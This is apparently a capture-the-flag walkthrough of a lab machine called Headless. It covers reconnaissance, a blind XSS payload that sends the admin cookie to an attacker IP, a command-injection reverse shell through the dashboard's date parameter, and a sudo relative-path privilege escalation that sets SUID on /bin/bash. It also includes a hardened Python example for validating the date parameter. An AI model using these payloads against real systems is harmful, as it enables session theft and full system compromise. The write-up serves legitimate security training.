Headless
Reconnaissance
We start with a standard nmap scan:
nmap -sC -sV -oN nmap/initial 10.10.11.8
Ports open:
- Port 22 — SSH (OpenSSH)
- Port 5000 — HTTP (Werkzeug/Python)
Enumeration
Visiting port 5000, we see a simple countdown timer. Directory fuzzing reveals a /support endpoint.
gobuster dir -u http://10.10.11.8:5000 -w /usr/share/wordlists/dirb/common.txt
The /support page contains a form that allows us to submit a message. Inspecting the request, we notice that the User-Agent header is logged and later reflected back on a page viewed by the administrator, so it can carry a cross-site scripting (XSS) payload.
Foothold
By injecting a blind XSS payload into the User-Agent header, we can steal the administrator's cookie.
curl -X POST http://10.10.11.8:5000/support -d "message=test" -H "User-Agent: <script>var i=new Image(); i.src='http://10.10.14.5/?cookie='+btoa(document.cookie);</script>"
We start a local Python HTTP server and quickly receive a callback containing the admin cookie. We then use this cookie to access a hidden /dashboard that we couldn't reach before.
On the dashboard, there's a feature to generate reports by date. The date parameter is vulnerable to command injection, so we construct a payload that spawns a reverse shell:
POST /dashboard HTTP/1.1
Cookie: admin=...

date=2026-03-20;bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
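For contrast, here is an added example (not code from the box or from this write-up) of how the dashboard's date parameter should be handled server-side: validate it against a strict date format and hand it to the report tool as a separate argv element with no shell in between. The `report-tool` command name and its `--date` flag are assumed placeholders.

```python
"""Hardened handling of a report 'date' parameter (added example).

Assumptions: the dashboard runs something like `report-tool --date <date>`;
`report-tool` and `--date` are placeholders, not the real box's binary.
"""
import re
import subprocess
from datetime import date

# Strict allow-list: exactly YYYY-MM-DD and nothing else.
DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")


def vulnerable_report_command(user_date: str) -> str:
    """The pattern behind the foothold: untrusted input spliced into a
    shell string that is later run with shell=True. Shown for contrast only."""
    return f"report-tool --date {user_date}"


def parse_report_date(user_date: str) -> date:
    """Reject anything that is not a real calendar date."""
    if not DATE_RE.fullmatch(user_date):
        raise ValueError("date must be YYYY-MM-DD")
    return date.fromisoformat(user_date)  # also rejects e.g. 2026-13-40


def safe_report_argv(user_date: str) -> list:
    """Validated date passed as its own argv element; no shell involved."""
    d = parse_report_date(user_date)
    return ["report-tool", "--date", d.isoformat()]


def run_report(user_date: str) -> subprocess.CompletedProcess:
    # shell=False: ';', '|' and '$(...)' inside an argv element are plain
    # characters to the child process, never shell metacharacters.
    return subprocess.run(safe_report_argv(user_date), shell=False,
                          check=True, capture_output=True)


def is_injection_attempt(user_date: str) -> bool:
    """Detection hook: a parameter that fails validation is worth logging."""
    try:
        parse_report_date(user_date)
        return False
    except ValueError:
        return True
```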
We catch the shell as dvir. Grabbing the user flag:
cat /home/dvir/user.txt
Privilege Escalation
Checking sudo -l, we see that the user can execute /usr/bin/syscheck without a password.
sudo -l
# User dvir may run the following commands on headless:
# (ALL) NOPASSWD: /usr/bin/syscheck
Looking at /usr/bin/syscheck, it's a bash script that calls initdb.sh by a relative path rather than an absolute one, so whichever initdb.sh sits in the caller's current directory is the one that runs as root.
We can exploit this by creating a malicious initdb.sh in our current directory, making it executable, and running sudo /usr/bin/syscheck.
echo "chmod +s /bin/bash" > initdb.sh
chmod +x initdb.sh
sudo /usr/bin/syscheck
The script executes our payload, setting the SUID bit on /bin/bash.
/bin/bash -p
whoami
# root
Root flag captured! 🏴
